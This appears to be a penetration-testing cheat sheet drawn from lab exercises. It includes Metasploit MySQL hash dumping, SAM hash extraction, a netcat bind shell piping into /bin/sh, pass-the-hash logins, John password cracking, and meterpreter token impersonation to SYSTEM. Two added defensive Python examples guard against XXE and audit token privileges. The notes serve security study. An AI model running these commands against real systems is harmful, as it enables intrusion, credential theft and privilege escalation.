   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306              yes       The target port (TCP)
   SQL       select version()  yes       The SQL to execute.
   USERNAME                    no        The username to authenticate as

msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.10.177.233
RHOSTS => 10.10.177.233
msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
USERNAME => root
msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.177.233

[*] 10.10.177.233:3306 - Sending statement: 'select version()'...
[*] 10.10.177.233:3306 -  | 5.7.29-0ubuntu0.18.04.1 |
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
SQL => show databases
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.177.233

[*] 10.10.177.233:3306 - Sending statement: 'show databases'...
[*] 10.10.177.233:3306 -  | information_schema |
[*] 10.10.177.233:3306 -  | mysql |
[*] 10.10.177.233:3306 -  | performance_schema |
[*] 10.10.177.233:3306 -  | sys |
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_sql) > 

Schema Dump

msf6 auxiliary(scanner/mysql/mysql_schemadump) > options

Module options (auxiliary/scanner/mysql/mysql_schemadump):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DISPLAY_RESULTS  true             yes       Display the Results to the Screen
   PASSWORD         password         no        The password for the specified username
   RHOSTS           10.10.177.233    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            3306             yes       The target port (TCP)
   THREADS          1                yes       The number of concurrent threads (max one per host)
   USERNAME         root             no        The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_schemadump) > 

Hash Dump

msf6 auxiliary(scanner/mysql/mysql_schemadump) > search mysql_hashdump

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/analyze/crack_databases                        normal  No     Password Cracker: Databases
   1  auxiliary/scanner/mysql/mysql_hashdump                   normal  No     MYSQL Password Hashdump


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/mysql/mysql_hashdump

msf6 auxiliary(scanner/mysql/mysql_schemadump) > use 1
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         no        The password for the specified username
   RHOSTS    10.10.177.233    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  root             no        The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_hashdump)

samdump2

SAM (Security Account Manager) is one of the database files.
Back when python2 was still alive,
https://github.com/Neohapsis/creddump7.git
presumably worked, but when I tried it as of December 2020 it did not work.
(Addendum)
It turned out to work once the following are installed:

  • Install pip
curl https://bootstrap.pypa.io/get-pip.py | sudo python -
sudo pip install pycrypto

One alternative tool I found is this samdump2. It comes standard on Kali Linux, but it does not seem to be applicable to Windows 10.

└─$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

nmap

NSE (Nmap Script Engine)

Categories

  • safe:- Won't affect the target
  • intrusive:- Not safe: likely to affect the target
  • vuln:- Scan for vulnerabilities
  • exploit:- Attempt to exploit a vulnerability
  • auth:- Attempt to bypass authentication for running services (e.g. Log into an FTP server anonymously)
  • brute:- Attempt to bruteforce credentials for running services
  • discovery:- Attempt to query running services for further information about the network (e.g. query an SNMP server).

More can be found here.
https://nmap.org/book/nse-usage.html

How to find scripts

/usr/share/nmap/scripts/script.db

smb

Enumerate SMB shares and users

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.166.21

When netcat cannot be used

mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

The command first creates a named pipe at /tmp/f. It then starts a netcat listener, and connects the input of the listener to the output of the named pipe. The output of the netcat listener (i.e. the commands we send) then gets piped directly into sh, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe, thus completing the circle.

Shell upgrading

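Right after connecting a reverse shell with nc, things are inconvenient in several ways: Ctrl+C kills the entire shell, and TAB autocompletion and arrow-key history search are not available.

Upgrading the shell makes these usable.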

# Spawn a bash shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'

# Enable terminal commands (such as clear)
$ export TERM=xterm

# Suspend the job once with Ctrl + z
(Ctrl + z)

# This drops you back to your own terminal, so run the command below
# Turn terminal echo off (this enables TAB completion, arrow-key history, killing a process with Ctrl+C, and so on)
# Then bring the job back to the foreground
$ stty raw -echo; fg

Windows registry

Pass the Hash with Remote Desktop

pth-winexe -U 'admin%hash' //10.10.157.38 cmd.exe

Log in using the LM and NTLM hashes. No password cracking is needed. Surprising.
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/

LFI & RFI (Local/Remote File Inclusion)

XXE

XXE stands for XML External Entity Injection.

  • in-band XXE
    An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.

  • out-of-band (OOB-XXE)
    In out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application, and the attacker has to reflect the output of their XXE payload to some other file or their own server.

Payload Examples
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
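
The defensive counterpart to both variants, as an added example that is not part of the original notes: in-band and out-of-band XXE both need a DOCTYPE, so untrusted XML can be refused before it reaches the application parser. The function name, exception class and sample documents are constructed for this example.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """The document declares a DTD or entities and is refused."""


def _forbid(what):
    # Build an expat callback that aborts parsing as soon as it fires
    def handler(*_args):
        raise ForbiddenXML(f"{what} not allowed in untrusted XML")
    return handler


def parse_untrusted(xml_bytes):
    """Parse XML only if it has no DOCTYPE and no entity declarations."""
    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = _forbid("DOCTYPE")
    guard.EntityDeclHandler = _forbid("entity declaration")
    guard.ExternalEntityRefHandler = _forbid("external entity reference")
    guard.Parse(xml_bytes, True)      # raises ForbiddenXML or expat.ExpatError
    return ET.fromstring(xml_bytes)   # reached only for DTD-free documents


# Constructed sample documents (paths and hosts are placeholders)
BENIGN = b'<?xml version="1.0"?><order><item>42</item></order>'
IN_BAND = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY ref SYSTEM "file:///constructed/placeholder">]>'
    b"<order><item>&ref;</item></order>"
)
OUT_OF_BAND = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order SYSTEM "http://collector.invalid/x.dtd">'
    b"<order><item>1</item></order>"
)

if __name__ == "__main__":
    print(parse_untrusted(BENIGN).findtext("item"))
    for name, doc in (("in-band", IN_BAND), ("out-of-band", OUT_OF_BAND)):
        try:
            parse_untrusted(doc)
        except ForbiddenXML as exc:
            print(f"{name}: rejected ({exc})")
```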

SSTI (Server Side Template Injection)

SSTI is when a user is able to pass in a parameter that can control the template engine that is running on the server.

Extension Validation

File Type Filtering

  • MIME Type

  • Magic Number

Indicate file type. Used in file type validation. Impossible to fake.

Use hexeditor

File Length Filtering

File Name Filtering

File Content Filtering

Cracking /etc/shadow

Usage: unshadow PASSWORD-FILE SHADOW-FILE

$ unshadow passwd shadow > rcvd
$ john --format=sha512crypt --wordlist=~/rockyou.txt rcvd

John single mode

Cracking using John's single mode - word mangling.

Each hash in the file should be prefixed with a word and a ":".

Joker:7bf6d9bb82bed1302f331fc6b816aada

Example:

$ john --show --format=raw-md5 hash7.txt
Joker:Jok3r

1 password hash cracked, 0 left

Define custom rules

Zip2John

zip2john [options] [zip file] > [output file]

RaR2John

rar2john [rar file] > [output file]

ssh2john

python3 /opt/john/ssh2john.py [id_rsa private key file] > [output file]

Search vulnerability (suggestion) on Windows

Windows Power Shell Priv-Esc Powerup

Windows Power Shell nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

WinPEAS (Windows Privilege Escalation Awesome Scripts)

Windows Privilege Escalation Token Abuse

Metasploit Incognito

meterpreter > load incognito                                                                                                                               
Loading extension incognito...Success.  

example

C:\Users\bruce\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled

C:\Users\bruce\Desktop>^C
Terminate channel 1? [y/N]  y                                                                                                                              
meterpreter > load incognito                                                                                                                               
Loading extension incognito...Success.                                                                                                                     
meterpreter > list_tokens /g                                                                                                                               
Usage: list_tokens <list_order_option>                                                                                                                     

Lists all accessible tokens and their privilege level

OPTIONS:

    -g        List tokens by unique groupname
    -u        List tokens by unique username

meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WinDefend
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc

meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]                                                   
 4     0     System                x64   0                                      
 396   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 524   516   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 572   564   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 580   516   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 608   564   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 668   580   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 676   580   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 684   580   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 772   668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 848   668   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 920   608   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 936   668   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 992   668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1012  668   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1016  668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1044  524   conhost.exe           x64   0        alfred\bruce                  C:\Windows\System32\conhost.exe
 1064  668   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1212  668   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1240  668   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1356  668   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1436  668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1464  668   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
 1492  668   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1536  2812  powershell.exe        x86   0        alfred\bruce                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
 1628  668   jenkins.exe           x64   0        alfred\bruce                  C:\Program Files (x86)\Jenkins\jenkins.exe
 1720  668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1756  668   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1828  1628  java.exe              x86   0        alfred\bruce                  C:\Program Files (x86)\Jenkins\jre\bin\java.exe
 1848  668   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1940  524   conhost.exe           x64   0        alfred\bruce                  C:\Windows\System32\conhost.exe
 2452  668   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2624  1536  rse.exe               x86   0        alfred\bruce                  C:\Users\bruce\Desktop\rse.exe
 2812  1828  cmd.exe               x86   0        alfred\bruce                  C:\Windows\SysWOW64\cmd.exe
 3024  668   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 3060  668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe

meterpreter > migrate 668
[*] Migrating from 2624 to 668...
[*] Migration completed successfully.
meterpreter > 
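
Read defensively, the `whoami /priv` listing at the start of this session is audit input: a privilege shown as Disabled is still held in the token and the process can enable it, so both states matter when reviewing a service account. The following is an added example, not part of the original notes; the selection of privileges treated as sensitive is this example's own choice.

```python
import re

# Privileges that allow acting under another identity or bypassing file and
# driver protections. The names are Windows privilege constants; which ones
# to treat as sensitive is this example's choice.
SENSITIVE = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege",
}

# One table row: privilege name, free-text description, state
ROW = re.compile(r"^(Se\w+)\s+(.+?)\s+(Enabled|Disabled)$")

# Rows copied from the whoami /priv listing above (shortened)
SAMPLE = """\
Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
"""


def audit_privileges(whoami_output):
    """Split the sensitive privileges in a token into enabled and held-but-disabled."""
    report = {"enabled": [], "held_disabled": []}
    for line in whoami_output.splitlines():
        m = ROW.match(line.strip())
        if not m or m.group(1) not in SENSITIVE:
            continue  # header, separator, or a privilege we do not track
        key = "enabled" if m.group(3) == "Enabled" else "held_disabled"
        report[key].append(m.group(1))
    return report


if __name__ == "__main__":
    result = audit_privileges(SAMPLE)
    print("enabled:      ", ", ".join(result["enabled"]))
    print("held/disabled:", ", ".join(result["held_disabled"]))
```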

HTTrack Website Copier

HTTrack is a free (GPL, libre/free software) and easy-to-use offline browser utility.

It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.

WinHTTrack is the Windows (from Windows 2000 to Windows 10 and above) release of HTTrack, and WebHTTrack the Linux/Unix/BSD release. See the download page.

Path Analyzer Pro

Path Analyzer Pro delivers advanced network route-tracing with performance tests, DNS, whois, and network resolution to investigate network issues. By integrating all these powerful features into one simple graphical interface, Path Analyzer Pro has become a must-have tool for any network, systems, or security professional on Windows and Mac OS X. Download a FREE trial copy.

Colasoft Packet Builder

Colasoft Packet Builder enables creating custom network packets; users can use this tool to check their network protection against attacks and intruders. Colasoft Packet Builder includes a very powerful editing feature. Besides common HEX editing raw data, it features a Decoding Editor allowing users to edit specific protocol field values much easier.

Users are also able to edit decoding information in two editors - Decode Editor and Hex Editor. Users can select one from the provided templates Ethernet Packet, ARP Packet, IP Packet, TCP Packet and UDP Packet, and change the parameters in the decoder editor, hexadecimal editor or ASCII editor to create packets. Any changes will be immediately displayed in the other two windows. In addition to building packets, Colasoft Packet Builder also supports saving packets to packet files and sending packets to the network.

MegaPing

MegaPing is the ultimate must-have toolkit that provides essential utilities for Information System specialists, system administrators, IT solution providers or individuals.

NetScanTools Pro

NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for Network Professionals. Research IPv4 addresses, IPv6 addresses, hostnames, domain names, email addresses and URLs automatically** or with manual tools. It is designed for the Windows operating system GUI. **Automated tools are started interactively by the user.

Network Topology Mapper

Network mapping software built to automatically plot your network.

Key Features

  • Automate device discovery and mapping
  • Build multiple maps from a single scan
  • Export network diagrams to Visio
  • Auto-detect changes to network topology
  • Perform multi-level network discovery
  • Address regulatory PCI compliance

Angry IP Scanner

Angry IP scanner is a very fast IP address and port scanner.

It can scan IP addresses in any range as well as any of their ports. It is cross-platform and lightweight. Not requiring any installation, it can be freely copied and used anywhere.

Angry IP scanner simply pings each IP address to check if it’s alive, then optionally resolves its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be extended with plugins.

It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc.

IP-Tools

IP-Tools is a great program that allows users to monitor their network activity and data movements. In addition to providing standard information about nodes connected to a network, the application allows monitoring of advanced parameters such as data flow. All in all, this is a great application for network administrators and advanced computer users.
